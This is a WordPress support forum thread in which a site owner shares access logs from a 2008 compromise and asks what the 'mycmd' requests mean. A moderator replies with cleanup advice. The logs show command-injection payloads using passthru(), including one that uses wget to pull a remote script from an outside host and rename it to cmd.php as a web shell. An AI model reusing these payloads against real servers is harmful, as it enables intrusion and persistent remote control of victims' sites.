Title: New Exploit? Last modified: August 19, 2016 --- # New Exploit? * [clar2242](https://wordpress.org/support/users/clar2242/) * (@clar2242) * [18 years, 3 months ago](https://wordpress.org/support/topic/new-exploit-1/) * Hey, just wondering if anybody has experienced this before… * Last night I was alerted that my server was down, got it rebooted and tried to figure out what happened. * Looks like somehow somebody got r57 shell uploaded to my server. * Looking through my access logs: * 80.218.10.244 – – [14/Feb/2008:20:54:25 +0000] “GET /?mycmd=passthru(“id”); HTTP/ 1.0″ 200 19911 “-” “Snoopy v1.2.3” 80.218.10.244 – – [14/Feb/2008:20:54:28 + 0000] “GET /?mycmd=passthru(“uname+-a”); HTTP/1.0″ 200 19958 “-” “Snoopy v1.2.3” 80.218.10.244 – – [14/Feb/2008:20:54:33 +0000] “GET /?mycmd=passthru(“w”); HTTP/ 1.0″ 200 20145 “-” “Snoopy v1.2.3” 80.218.10.244 – – [14/Feb/2008:20:54:42 +0000]“ GET /?mycmd=passthru(“pwd”); HTTP/1.0″ 200 19896 “-” “Snoopy v1.2.3” 80.218.10.244––[ 14/Feb/2008:20:54:46 +0000] “GET /?mycmd=passthru(“ls+-lah”); HTTP/1.0″ 200 22356“-”“ Snoopy v1.2.3” 80.218.10.244 – – [14/Feb/2008:20:54:58 +0000] “GET /?mycmd=passthru(“ wget+coded.altervista.org%2Fcmd.txt”); HTTP/1.0″ 200 19857 “-” “Snoopy v1.2.3” 80.218.10.244 – – [14/Feb/2008:20:55:11 +0000] “GET /cmd.txt HTTP/1.1” 200 98799“-”“ Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11” 80.218.10.244 – – [14/Feb/2008:20:55:21 +0000] “GET /?mycmd=passthru(“mv+cmd. txt+cmd.php”); HTTP/1.0″ 200 19857 “-” “Snoopy v1.2.3” 80.218.10.244 – – [14/ Feb/2008:20:55:26 +0000] “GET /cmd.php HTTP/1.1” 200 36414 “-” “Mozilla/5.0 ( X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11” 80.218.10.244––[ 14/Feb/2008:20:56:20 +0000] “POST /cmd.php HTTP/1.1” 200 33523 “-” “Mozilla/5.0( X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11” * Any ideas what where the mycmd stuff is done? I can’t find it by doing a recursive grep. * And I can’t recreate this doing it myself. Any ideas?? * I’ve updated to 2.3.3 this morning Viewing 1 replies (of 1 total) * [Kafkaesqui](https://wordpress.org/support/users/kafkaesqui/) * (@kafkaesqui) * [18 years, 3 months ago](https://wordpress.org/support/topic/new-exploit-1/#post-697041) * There is no ‘mycmd’ GET query var in WordPress. Apparently a blind attempt to test for exploits (not hard to guess what ?mycmd= is meant for, though — anyone know of a WP plugin using it?). But I would do the standard of password changes, check of permissions on files/directories, etc. * [Moderator note: moving to Misc. forum] Viewing 1 replies (of 1 total) The topic ‘New Exploit?’ is closed to new replies. * In: [Everything else WordPress](https://wordpress.org/support/forum/miscellaneous/) * 1 reply * 2 participants * Last reply from: [Kafkaesqui](https://wordpress.org/support/users/kafkaesqui/) * Last activity: [18 years, 3 months ago](https://wordpress.org/support/topic/new-exploit-1/#post-697041) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics